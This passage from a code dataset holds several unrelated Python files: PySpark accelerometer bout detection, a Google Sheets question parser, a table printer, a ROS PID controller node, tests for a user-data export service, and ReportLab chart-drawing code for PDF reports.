(F.col('pause') == 0),\n F.last(F.col('activity_start'), ignorenulls=True)\n .over(Window.orderBy(ts_name))\n ).otherwise(F.col('activity_start'))\n ).drop('pause')\n\n ## define a flag to select rows with non-zero 'activity_start'\n df3 = df3.withColumn('check', F.when(F.col('activity_start').isNotNull(), F.lit(1)).otherwise(F.lit(0)))\n\n ## select rows with non-zero 'activity_start'\n df2 = df3.select(['{}'.format(ts_name), 'check']).filter(F.col('check') == 1)\n\n ## assign bout start\n df2 = consecutive_time(df2, '{}'.format(ts_name), interval).selectExpr(\n ['{}'.format(ts_name), 'start as bout_start'])\n\n ## assign bout to dataframe\n df3 = df3.join(df2, ['{}'.format(ts_name)], 'leftouter').drop(*['activity_start', 'check'])\n\n df3 = df3.withColumn('bout_start', F.when(F.col('bout_start').isNull(),\n F.col(ts_name)\n ).otherwise(F.col('bout_start'))\n )\n\n ## filter periods larger than the minimum bout duration\n df1 = df3.groupBy('bout_start').count()\n df1.checkpoint()\n\n df1 = df1.filter(df1['count'] > epochs_min_bout).orderBy('bout_start')\n\n df1 = df1.withColumn('bout_end', (F.col('bout_start').cast(IntegerType()) +\n F.col('count') * interval).cast(TimestampType())\n ).drop('count')\n\n df1 = df1.withColumn(new_col, F.row_number().over(Window.orderBy('bout_start')))\n\n bouts_list = df1.collect()\n\n ## initialize activityBoutNumber to zero\n df3 = df3.drop(*['start', 'end', 'check', 'pause', 'bout_start'])\n\n df3 = df3.withColumn(new_col, F.lit(0))\n\n df3.checkpoint()\n\n ## assign activityBoutNumber\n for row in bouts_list:\n df3 = df3.withColumn(new_col, F.when((F.col('{}'.format(ts_name)) >= row['bout_start']) &\n (F.col('{}'.format(ts_name)) <= row['bout_end']),\n row[new_col]\n ).otherwise(F.col(new_col))\n )\n\n df3 = df3.orderBy('{}'.format(ts_name))\n\n return df3\n\n\n##########################################################################################################\n\ndef select_acc_intervals(df, ts_name, interval, window, incl_vect=False, incl_acc=False):\n \"\"\"\n Filter DataFrame with a new epoch duration.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param interval:\n initial epoch duration (in seconds)\n :param window:\n new epoch duration (in seconds)\n :param incl_vect:\n if true, calculate vector magnitude and include it in the DataFrame\n :param incl_acc:\n if true, all raw accelerometer data are included in the DataFrame\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## the window must be larger tha a single epoch\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n assert window >= interval, \"Window smaller than epoch.\"\n\n cols = df.columns\n selected_cols = ['axis1', 'axis2', 'axis3', 'steps'] # TODO: add eeAccumulator\n\n minp = df.select(F.min(ts_name).cast('long')).first()[0]\n\n if interval < window:\n\n df2 = df.withColumn('tmp', F.row_number().over(Window.orderBy(ts_name)) - 1)\n\n df2 = df2.withColumn('total_sec', F.col(ts_name).cast('long')).cache()\n df2 = df2.checkpoint()\n df2.count()\n\n for col in selected_cols:\n\n df2 = df2.withColumn(col, F.when(((F.col('total_sec') - minp) % window == 0),\n F.sum(col).over(Window.orderBy('total_sec')\n .rangeBetween(0, window - interval)\n )\n ).otherwise(0)\n )\n\n df2 = df2.withColumn('duration', F.col(ts_name).cast(IntegerType()) -\n F.lag(F.col(ts_name).cast(IntegerType()), 1, minp)\n .over(Window.orderBy(ts_name))\n ).drop('total_sec')\n\n df2 = df2.withColumn('tmp', (F.col('tmp') * F.col('duration')) % window).drop('duration').orderBy(ts_name)\n\n df2 = df2.filter(F.col('tmp') == 0).drop('tmp').orderBy(ts_name)\n\n else:\n\n df2 = df\n\n if incl_vect:\n\n df2 = df2.withColumn('vectMag', F.sqrt(F.col('axis1') ** 2 + F.col('axis2') ** 2 + F.col('axis3') ** 2))\n\n cols.insert(1, 'vectMag')\n\n df2 = df2.select(cols).orderBy(ts_name)\n\n if not incl_acc:\n\n df2 = df2.select(ts_name, cols[1])\n\n return df2\n\n\n##########################################################################################################\n\ndef non_wear_filter(df, ts_name, AC_name, AI_name, interval, DURATION):\n \"\"\"\n Determine non-wearing period, for which activity count and activity intensity are assigned equal to -2.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param AI_name:\n column with activity intensity values\n :param interval:\n epoch duration (in seconds)\n :param DURATION:\n non-wearing period (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n TOL = 0\n\n UP = 0\n\n LOW = 0\n\n new_col = 'no_wear'\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the DataFrame and assing zero to missing values\n df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n df2 = df2.cache()\n df2 = df2.checkpoint()\n df2.count()\n\n ## assign activity count and activity intensity equal to -2 for non valid data\n df2 = df2.withColumn(AC_name, F.when(F.col(new_col) > 0, -2).otherwise(F.col(AC_name)))\n\n df2 = df2.withColumn(AI_name, F.when(F.col(new_col) > 0, -2).otherwise(F.col(AI_name))).drop(new_col)\n\n return df2\n\n\n##########################################################################################################\n\ndef activity_bout_filter(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Detect activity bouts.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the dataframe and assing zero to missing values\n df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n return df2\n\n\n##########################################################################################################\n\ndef sedentary_bout_filter(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Detect sedentary bouts.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param AC_name:\n column with activity count values\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## select valid epochs with non-negative activity count\n df1 = df.filter(F.col(AC_name) >= 0)\n\n df1 = df1.cache()\n df1 = df1.checkpoint()\n df1.count()\n\n df1 = detect_bouts(df, ts_name, AC_name, new_col, interval, UP, LOW, DURATION, TOL)\n\n df1 = df1.select([ts_name, new_col])\n\n ## merge new column with the dataframe and assing zero to missing values\n df2 = df.join(df1, [ts_name], 'leftouter').orderBy(ts_name).fillna(0, subset=[new_col])\n\n return df2\n\n##########################################################################################################\n","repo_name":"emolinaro/PALMSpy","sub_path":"src/AccProcessing.py","file_name":"AccProcessing.py","file_ext":"py","file_size_in_byte":23607,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"}
+{"seq_id":"8097923076","text":"import pygsheets\nfrom secret import secret\nimport os\n\nclass QuestionParse:\n def __init__(self):\n self.file = pygsheets.authorize(client_secret=os.path.join(os.getcwd(), '/secret/credit.json'))\n self.file = self.file.open_by_key(secret.file_id)\n self.table = self.file.worksheet('index', 0)\n\n # if flag == True, then all values are parsed,\n # if flag == False, then the function will return only new values\n def __parse(self, flag: bool):\n array = self.table.get_all_values(returnas='matrix')\n array = list(filter(\n lambda x: (x[0] != '') and ((str(x[6]).replace(\" \", \"\") not in {'Обработан', 'обработан'}) or flag), array)\n )\n return array\n\n def __prepare_string(self, array):\n array = array[1::]\n result = \"сообщения в количестве {} штук \\n\".format(len(array))\n iteration_str = \"Время: {} \\n\" \\\n \"ФИО: {} \\n\" \\\n \"Почта: {} \\n\" \\\n \"Курс: {} \\n\" \\\n \"Группа: {} \\n\" \\\n \"Вопрос: {} \\n\" \\\n \"---------------\\n\"\n for val in array:\n result += iteration_str.format(\n val[0],\n val[1],\n val[2],\n val[3],\n val[4],\n val[5]\n )\n\n return result\n\n def get_new_messages(self):\n array = self.__parse(False)\n if len(array) < 2:\n return \"Нет новых сообщений\"\n return \"Новые \" + self.__prepare_string(array)\n\n def get_all_messages(self):\n array = self.__parse(True)\n return \"Все \" + self.__prepare_string(array)\n","repo_name":"vgtstptlk/question_bot","sub_path":"QuestionParse.py","file_name":"QuestionParse.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"12366361212","text":"#!/usr/bin/env python\n\nimport locale\nimport sys\nimport six\n\n\n# Below causes issues in some locales and noone knows why it was included so commenting out for now\n# locale.setlocale(locale.LC_NUMERIC, \"\")\n\n\nclass Table:\n def format_num(self, num):\n \"\"\"Format a number according to given places.\n Adds commas, etc. Will truncate floats into ints!\"\"\"\n\n try:\n if \".\" in num:\n inum = float(num)\n return locale.format(\"%.2f\", (0, inum), True)\n else:\n inum = int(num)\n return locale.format(\"%.*f\", (0, inum), True)\n\n except (ValueError, TypeError):\n return str(num.encode('utf-8')) if isinstance(num, six.string_types) else str(num)\n\n def get_max_width(self, table, index):\n \"\"\"Get the maximum width of the given column index\"\"\"\n return max([len(self.format_num(row[index])) for row in table])\n\n def pprint_table(self, table):\n \"\"\"Prints out a table of data, padded for alignment\n @param table: The table to print. A list of lists.\n Each row must have the same number of columns. \"\"\"\n col_paddings = []\n\n out = \"\"\n for i in range(len(table[0])):\n col_paddings.append(self.get_max_width(table, i))\n\n for row in table:\n # left col\n out += str(row[0]).ljust(col_paddings[0] + 1)\n # rest of the cols\n for i in range(1, len(row)):\n col = self.format_num(row[i]).rjust(col_paddings[i] + 2)\n out += col\n out += \"\\n\"\n\n return out\n\n\nif __name__ == \"__main__\":\n T = Table()\n T.bumppath = '/home/jmht/ample-dev1/examples/toxd-example/ROSETTA_MR_3/MRBUMP/cluster_run1'\n T.cluster = True\n table = T.maketable()\n out = sys.stdout\n T.pprint_table(out, table)\n","repo_name":"rigdenlab/ample","sub_path":"ample/util/printTable.py","file_name":"printTable.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"}
+{"seq_id":"74328269543","text":"#!/usr/bin/env python\n\"\"\"\nThe `pid.py` module is a Python implementation of a\nProportional-Integral-Derivative controller for ROS. By default, it listens on\na topic \"desired\" for the current set point and a topic \"state\" for the current\nstate of the plant being controller. It then writes to a topic \"cmd\" with the\noutput of the PID controller. If the parameter `variable` is defined, these\ntopics will be renamed as follows. This makes it easy to integrate this PID\ncontroller with ROS topics from firmware modules without remapping each of the\ntopics individually.\n\n desired -> /desired\n state -> /measured\n cmd -> /commanded\n\nIt also reads configuration from a number of other ROS parameters as well. The\ncontroller gains are passed in as parameters `Kp`, `Ki`, and `Kd`. It also\naccepts an `upper_limit` and `lower_limit` to bound the control effort output.\n`windup_limit` defines a limit for the integrator of the control loop.\n`deadband_width` can be used to apply a deadband to the control effors.\nSpecifically, commands with absolute value less than `deadband_width` will be\nchanged to 0.\n\"\"\"\nimport rospy\nfrom std_msgs.msg import Float64, String\n\nclass PID:\n \"\"\" Discrete PID control \"\"\"\n def __init__(self, Kp=0, Ki=0, Kd=0, upper_limit=1, lower_limit=-1,\n windup_limit=1000, deadband_width=0):\n self.Kp = Kp\n self.Ki = Ki\n self.Kd = Kd\n self.upper_limit = upper_limit\n self.lower_limit = lower_limit\n self.windup_limit = windup_limit\n self.deadband_width = deadband_width\n\n self.set_point = None\n self.last_error = 0\n self.integrator = 0\n\n def update(self, state):\n # If setpoint was made null, or was already null, do nothing.\n if self.set_point is None:\n return\n\n error = self.set_point - state\n\n if abs(error) < self.deadband_width:\n return 0\n\n p_value = self.Kp * error\n d_value = self.Kd * (error - self.last_error)\n self.last_error = error\n self.integrator = self.integrator + error\n self.integrator = max(-self.windup_limit, min(self.windup_limit, self.integrator))\n i_value = self.Ki * self.integrator\n\n res = p_value + i_value + d_value\n res = min(self.upper_limit, max(self.lower_limit, res))\n\n return res\n\nif __name__ == '__main__':\n rospy.init_node('pid')\n\n # Make sure that we're under an environment namespace.\n namespace = rospy.get_namespace()\n if namespace == '/':\n raise RuntimeError(\n \"Cannot be run in the global namespace. Please \"\n \"designate an environment for this module.\"\n )\n\n param_names = [\n \"Kp\", \"Ki\", \"Kd\", \"lower_limit\", \"upper_limit\", \"windup_limit\",\n \"deadband_width\"\n ]\n param_values = {}\n for param_name in param_names:\n private_param_name = \"~\" + param_name\n if rospy.has_param(private_param_name):\n param_values[param_name] = rospy.get_param(private_param_name)\n\n pid = PID(**param_values)\n\n pub_name = \"cmd\"\n state_sub_name = \"state\"\n desired_sub_name = \"desired\"\n\n variable = rospy.get_param(\"~variable\", None)\n if variable is not None:\n pub_name = \"{}/commanded\".format(variable)\n state_sub_name = \"{}/measured\".format(variable)\n desired_sub_name = \"{}/desired\".format(variable)\n\n pub = rospy.Publisher(pub_name, Float64, queue_size=10)\n\n def state_callback(item):\n cmd = pid.update(item.data)\n if cmd is None:\n return\n pub.publish(cmd)\n\n def set_point_callback(item):\n pid.set_point = item.data\n\n # When we receive the recipe end message, reset this PID controller to its default values.\n # This disables the set point so the controller will just idle until it is set by a new recipe.\n def recipe_end_callback(item):\n pid = PID(**param_values)\n pid.set_point = None\n\n recipe_end_topic = \"{ns}recipe_end/desired\".format(ns=rospy.get_namespace())\n recipe_end_sub = rospy.Subscriber(recipe_end_topic, String, recipe_end_callback)\n state_sub = rospy.Subscriber(state_sub_name, Float64, state_callback)\n set_point_sub = rospy.Subscriber(\n desired_sub_name, Float64, set_point_callback\n )\n\n rospy.spin()\n","repo_name":"OpenAgricultureFoundation/openag_brain","sub_path":"nodes/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"36"}
+{"seq_id":"15586536002","text":"import datetime\nimport io\nimport json\nimport os\nimport zipfile\nfrom unittest.mock import call\n\nimport boto3\nimport settings\nfrom moto import mock_s3\n\nimport pytest\nfrom userauth.services.export import ExportUserArchive\nfrom utils import hashid\n\npytestmark = pytest.mark.usefixtures('db_session')\n\n\nclass TestExportUserArchive:\n @pytest.fixture\n def user(self, user_factory):\n return user_factory.create()\n\n @pytest.fixture\n def export_user_archive(self, user) -> ExportUserArchive:\n return ExportUserArchive(user=user)\n\n @pytest.fixture\n def mocked_zip_file(self, mocker):\n zip_file_mock = mocker.MagicMock(spec=zipfile.ZipFile)\n mocker.patch(\"zipfile.ZipFile\", return_value=zip_file_mock)\n mocked_zip_file = zip_file_mock.__enter__.return_value = mocker.Mock()\n\n return mocked_zip_file\n\n @pytest.fixture\n def file_cleanup(self, user):\n hashed_user_id = hashid.encode(user.id)\n yield\n os.remove(f\"/tmp/{hashed_user_id}.zip\")\n\n def test_user_data_is_exported(self, user, export_user_archive):\n data = export_user_archive._export_user_data()\n assert data.get(\"user\") == json.dumps(\n {\n \"id\": user.id,\n \"profile\": {\n \"id\": user.profile.id,\n \"first_name\": user.profile.first_name,\n \"last_name\": user.profile.last_name,\n },\n \"email\": user.email,\n \"is_superuser\": user.is_superuser,\n \"is_active\": user.is_active,\n \"is_confirmed\": user.is_confirmed,\n \"created\": user.created.isoformat(),\n }\n )\n\n def test_crud_demo_items_data_is_exported(self, user, crud_demo_item_factory, export_user_archive):\n item = crud_demo_item_factory.create(created_by=user)\n data = export_user_archive._export_user_data()\n assert data.get(\"crud_demo_items\") == [json.dumps({\"id\": item.id, \"name\": item.name})]\n\n def test_document_demo_item_is_exported(self, user, document_demo_item_factory, export_user_archive):\n document = document_demo_item_factory.create(created_by=user)\n data = export_user_archive._export_user_files()\n assert document.file in data\n\n @mock_s3\n def test_zip_archive_is_created(self, user, document_demo_item_factory, mocked_zip_file, export_user_archive):\n s3 = boto3.client(\"s3\", region_name='us-east-1', endpoint_url=settings.AWS_S3_ENDPOINT_URL)\n s3.create_bucket(Bucket=settings.AWS_STORAGE_BUCKET_NAME)\n document_item = document_demo_item_factory.create()\n user_data = {\"user\": \"data\"}\n document_content = b\"content\"\n with io.BytesIO() as document_file:\n document_file.write(document_content)\n document_file.seek(0)\n s3.upload_fileobj(document_file, settings.AWS_STORAGE_BUCKET_NAME, document_item.file)\n hashed_user_id = hashid.encode(user.id)\n\n archive_file_path = export_user_archive._export_user_archive_to_zip(\n user_data=user_data, user_files=[document_item.file]\n )\n\n assert archive_file_path == f\"/tmp/{hashed_user_id}.zip\"\n assert [\n call.writestr(f'{hashed_user_id}/{hashed_user_id}.json', json.dumps(user_data).encode('utf-8')),\n call.writestr(f'{hashed_user_id}/{document_item.file}', document_content),\n ] in mocked_zip_file.mock_calls\n\n @pytest.mark.usefixtures('file_cleanup', 's3_exports_bucket')\n @pytest.mark.freeze_time\n def test_user_archive_export_url_is_generated(self, user, export_user_archive):\n timestamp = datetime.datetime.now().strftime(\"%d-%m-%y_%H-%M-%S\")\n expected_obj_key = f\"exports/{hashid.encode(user.id)}_{timestamp}.zip\"\n\n export_url = export_user_archive.run()\n\n assert settings.AWS_EXPORTS_STORAGE_BUCKET_NAME in export_url\n assert expected_obj_key in export_url\n","repo_name":"apptension/saas-boilerplate","sub_path":"packages/workers/userauth/tests/test_services.py","file_name":"test_services.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":1208,"dataset":"github-code","pt":"36"}
+{"seq_id":"32143238057","text":"# encoding = utf-8\n\nfrom SDK.SDKHeader import *\nimport random\nfrom General.GlobalSetting import stk_basic\nimport pandas as pd\nimport numpy as np\nfrom reportlab.graphics.charts.barcharts import VerticalBarChart\nfrom reportlab.graphics.charts.legends import Legend\n\nfrom reportlab.lib.pagesizes import letter\n\nfrom reportlab.platypus import *\nfrom reportlab.lib.styles import getSampleStyleSheet\n\n# 画图相关\nfrom reportlab.graphics.shapes import Drawing, PolyLine, colors, Auto\nfrom reportlab.graphics import renderPDF\nfrom reportlab.graphics.charts.lineplots import LinePlot\nfrom reportlab.graphics.widgets.markers import makeMarker\nfrom reportlab.pdfbase.pdfmetrics import stringWidth\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase import pdfmetrics\n\npdfmetrics.registerFont(TTFont('song', 'SURSONG.TTF'))\npdfmetrics.registerFont(TTFont('hei', 'SIMHEI.TTF'))\n\nfrom reportlab.lib import fonts\nfonts.addMapping('song', 0, 0, 'song')\nfonts.addMapping('song', 0, 1, 'song')\nfonts.addMapping('song', 1, 0, 'hei')\nfonts.addMapping('song', 1, 1, 'hei')\n\n\ndef addFront(canvas_param, theme, subtitle, pagesize=letter):\n \"\"\"\n 函数功能:为pdf文档添加功能,分“主题”、“副标题”两部分\n :param canvas:\n :param pagesize: 页面大小,默认A4\n :param theme: 主题字符串\n :param subtitle: 副标题字符串\n :return:\n \"\"\"\n PAGE_WIDTH = pagesize[0]\n PAGE_HEIGHT = pagesize[1]\n\n # 设置主标题字体并打印主标题\n canvas_param.setFont(\"song\", 30)\n canvas_param.drawString((PAGE_WIDTH-stringWidth(theme, fontName='song', fontSize=30))/2.0, PAGE_HEIGHT*0.618, theme)\n\n # 设置副标题字体并打印副标题\n canvas_param.setFont(\"song\", 10)\n canvas_param.drawString((PAGE_WIDTH-stringWidth(theme, fontName='song', fontSize=30))/2.0, PAGE_HEIGHT*0.15, subtitle)\n\n canvas_param.showPage()\n\n return canvas_param\n\n\ndef add_legend(draw_obj, chart, pos_x, pos_y):\n\n \"\"\"\n 函数功能:voltGroupDisplayByBar函数的子函数\n :param draw_obj:\n :param chart:\n :return:\n \"\"\"\n legend = Legend()\n legend.alignment = 'right'\n legend.fontName = 'song'\n legend.columnMaximum = 2\n legend.x = pos_x\n legend.y = pos_y\n legend.colorNamePairs = Auto(obj=chart)\n draw_obj.add(legend)\n\n\ndef ExtractPointFromDf_DateX(df_origin, date_col, y_col, timeAxis='day'):\n\n \"\"\"\n 函数功能:从一个dataframe中提取两列,组成point列表格式,以供ReportLab画图之用\n 同时将日期中的时间提取出来,转为秒。\n\n 本函数主要用来画当日数据!因为将datetime中的date去掉了,只保留time。\n\n :param df_origin:\n :param x_col:\n :param y_col:\n :return:\n \"\"\"\n\n # 将“data”列中的数据解析后,作为新的列增加到df中\n # df_origin = ExtractJsonToColum(df_row=df_origin, col='data')\n # if len(df_origin) == 0:\n # return []\n\n # 按时间排序,并删除空值\n df_origin = df_origin.sort_values(by=date_col, ascending=True)\n df_origin = df_origin[True - df_origin[y_col].isnull()]\n\n # if len(df_origin) == 0:\n # print('函数 ExtractPointFromDf_DateX:删除空值后,dataframe为空!入参df中不含指定列')\n # return df_origin\n\n # 提取时间,并将时间转为秒\n if timeAxis == 'day':\n df_origin['time'] = df_origin.apply(lambda x: DateStr2Sec(str(x[date_col])), axis=1)\n\n elif timeAxis == 'datetime':\n df_origin['time'] = df_origin.apply(lambda x: DatetimeStr2Sec(str(x[date_col])), axis=1)\n\n elif timeAxis == 'quarter':\n df_origin['time'] = df_origin.apply(lambda x: convertQuarter2Value(str(x[date_col])), axis=1)\n\n elif timeAxis == 'year':\n df_origin['time'] = df_origin.apply(lambda x: x[date_col], axis=1)\n\n elif timeAxis == 'month':\n df_origin['time'] = df_origin.apply(lambda x:DateStr2Sec(stdMonthDate2ISO(str(x[date_col]))),axis=1)\n\n # 单独取出相应两列,准备转成point格式\n df_part = df_origin.loc[:, ['time', y_col]]\n\n # 将df转为array\n point_array = list(map(lambda x: (x[0], float(x[1])), df_part.values))\n\n return point_array\n\n\ndef addAcTemp(canvas_param, opc_df_today,pos_x, pos_y, width, height):\n\n total_df = opc_df_today\n\n # 取出\n # “室外天气”、\n # “冷却侧供水温度”、\n # “冷却侧回水温度”、\n # “冷冻侧供水温度”、\n # “冷冻侧回水温度”\n total_df_OAT = total_df[total_df.browse_name == 'OA-T']\n\n total_df_CSSWT = total_df[total_df.browse_name == 'CS-SWT']\n total_df_CSRWT = total_df[total_df.browse_name == 'CS-RWT']\n\n total_df_FSSWT = total_df[total_df.browse_name == 'FS-SWT']\n total_df_FSRWT = total_df[total_df.browse_name == 'FS-RWT']\n\n # 生成5个变量相应的点阵\n data_OAT = ExtractPointFromDf_DateX(df_origin=total_df_OAT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_CSSWT = ExtractPointFromDf_DateX(df_origin=total_df_CSSWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n data_CSRWT = ExtractPointFromDf_DateX(df_origin=total_df_CSRWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_FSSWT = ExtractPointFromDf_DateX(df_origin=total_df_FSSWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n data_FSRWT = ExtractPointFromDf_DateX(df_origin=total_df_FSRWT, date_col='present_value_source_timestamp',\n y_col='present_value_value')\n\n data_origin = [tuple(data_OAT), tuple(data_CSSWT), tuple(data_CSRWT), tuple(data_FSSWT), tuple(data_FSRWT)]\n\n # 定义各曲线标签\n data_name_origin = ['室外温度', '冷却侧供水温度', '冷却侧回水温度', '冷冻侧供水温度', '冷冻侧回水温度']\n\n # 处理某条线没有数据的情况,若不处理“没有数据”的情况,画线的时候会报错!\n data = []\n data_name = []\n\n for i in range(0, len(data_origin)):\n if len(data_origin[i]) != 0:\n data.append(data_origin[i])\n data_name.append(data_name_origin[i])\n\n if len(data) == 0:\n print('函数 addAcTemp:原始df解析后没有想要���温度数据!')\n return canvas_param\n\n c = canvas_param\n # c.setFont(\"song\", 10)\n\n drawing = Drawing(width=width, height=height)\n\n lp = LinePlot()\n # lp.x = 50\n # lp.y = 50\n lp.height = height\n lp.width = width\n lp.data = data\n lp.joinedLines = 1\n\n # 定义各曲线颜色\n lp.lines[0].strokeColor = colors.blue\n lp.lines[1].strokeColor = colors.red\n lp.lines[2].strokeColor = colors.lightgreen\n lp.lines[3].strokeColor = colors.orange\n lp.lines[4].strokeColor = colors.darkgreen\n\n for i in range(0, len(data)):\n lp.lines[i].name = data_name[i]\n lp.lines[i].symbol = makeMarker('FilledCircle', size=0.5)\n lp.lines[i].strokeWidth = 0.2\n\n # lp.lineLabelFormat = '%2.0f'\n # lp.strokeColor = colors.black\n\n lp.xValueAxis.valueMin = 0\n lp.xValueAxis.valueMax = 60*60*24\n lp.xValueAxis.valueSteps = [n for n in range(0, 60*60*24, 60*60)]\n lp.xValueAxis.labelTextFormat = lambda x: str(s2t(x))[0:2]\n lp.yValueAxis.valueMin = 0\n # lp.yValueAxis.valueMax = 50\n # lp.yValueAxis.valueSteps = [1, 2, 3, 5, 6]\n drawing.add(lp)\n add_legend(draw_obj=drawing, chart=lp, pos_x=10, pos_y=-10)\n\n renderPDF.draw(drawing=drawing, canvas=c, x=pos_x, y=pos_y)\n\n\ndef genLPDrawing(data, data_note, width=letter[0]*0.8, height=letter[1]*0.25, timeAxis='day', y_min_zero=False):\n \"\"\"\n 函数功能:生成Drawing之用\n :return:\n \"\"\"\n\n drawing = Drawing(width=width, height=height)\n\n lp = LinePlot()\n # lp.x = 50\n # lp.y = 50\n lp.height = height\n lp.width = width\n lp.data = data\n lp.joinedLines = 1\n\n # 定义颜色集\n barFillColors = [\n colors.red, colors.green, colors.blue, colors.darkgoldenrod,\n colors.pink, colors.purple, colors.lightgreen, colors.darkblue, colors.lightyellow,\n colors.fidred, colors.greenyellow, colors.gray, colors.white,colors.blueviolet, colors.lightgoldenrodyellow]\n\n for i in range(0, len(data)):\n lp.lines[i].name = data_note[i]\n lp.lines[i].symbol = makeMarker('FilledCircle', size=0.5)\n lp.lines[i].strokeWidth = 0.2\n lp.lines[i].strokeColor = barFillColors[i]\n\n # lp.lineLabelFormat = '%2.0f'\n # lp.strokeColor = colors.black\n\n x_min = data[0][0][0]\n x_max = data[0][-1][0]\n\n lp.xValueAxis.valueMin = x_min\n lp.xValueAxis.valueMax = x_max\n\n if timeAxis=='day':\n step = int(((x_max - x_min) / (60 * 60 * 24)) / 30) + 1\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), 60 * 60 * 24 * step)]\n lp.xValueAxis.labelTextFormat = lambda x: str(Sec2Datetime(x)[0:10])\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n # lp.yValueAxis.valueMax = 50\n # lp.yValueAxis.valueSteps = [1, 2, 3, 5, 6]\n\n elif timeAxis=='quarter':\n\n step = int(((x_max - x_min)/0.25) / 30) + 1\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), int(math.ceil(0.25 * step)))]\n lp.xValueAxis.labelTextFormat = lambda x: convertValue2Quarter(x)\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n elif timeAxis=='year':\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), 1)]\n lp.xValueAxis.labelTextFormat = lambda x: str(x)\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n elif timeAxis=='month':\n\n lp.xValueAxis.valueSteps = list(map(lambda x:x[0],data[0]))\n lp.xValueAxis.labelTextFormat = lambda x: str(Sec2Datetime(x))[0:7]\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n drawing.add(lp)\n add_legend(draw_obj=drawing, chart=lp, pos_x=10, pos_y=-20)\n\n return drawing\n\n\ndef genBarDrawing(data, data_note, width=letter[0]*0.8, height=letter[1]*0.25):\n \"\"\"\n 函数功能:生成Drawing之用\n :return:\n \"\"\"\n data_value = list(map(lambda x:x[1],data))\n\n data_finale = [tuple(data_value)]\n\n drawing = Drawing(width=width, height=height)\n\n\n bc = VerticalBarChart()\n\n # bc.x = 50\n # bc.y = 50\n # bc.height = 125\n bc.width = width\n bc.data = data_finale\n # bc.valueAxis.valueMin = 0\n bc.barSpacing = 0\n\n # bc.valueAxis.valueMax = 50\n # bc.valueAxis.valueStep = 10\n # bc.categoryAxis.style = 'stacked'\n bc.categoryAxis.labels.boxAnchor = 'ne'\n bc.categoryAxis.labels.dx = 8\n bc.categoryAxis.labels.dy = -2\n bc.categoryAxis.labels.angle = 30\n\n barFillColors = [\n colors.red, colors.green, colors.white, colors.blue, colors.yellow,\n colors.pink, colors.purple, colors.lightgreen, colors.darkblue, colors.lightyellow,\n colors.fidred, colors.greenyellow, colors.gray, colors.blueviolet, colors.lightgoldenrodyellow]\n\n for i in range(len(data_finale)):\n bc.bars[i].name = data_note[i]\n\n # 最多只支持15种颜色,多出的设置为红色\n if i < 15:\n bc.bars[i].fillColor = barFillColors[i]\n else:\n 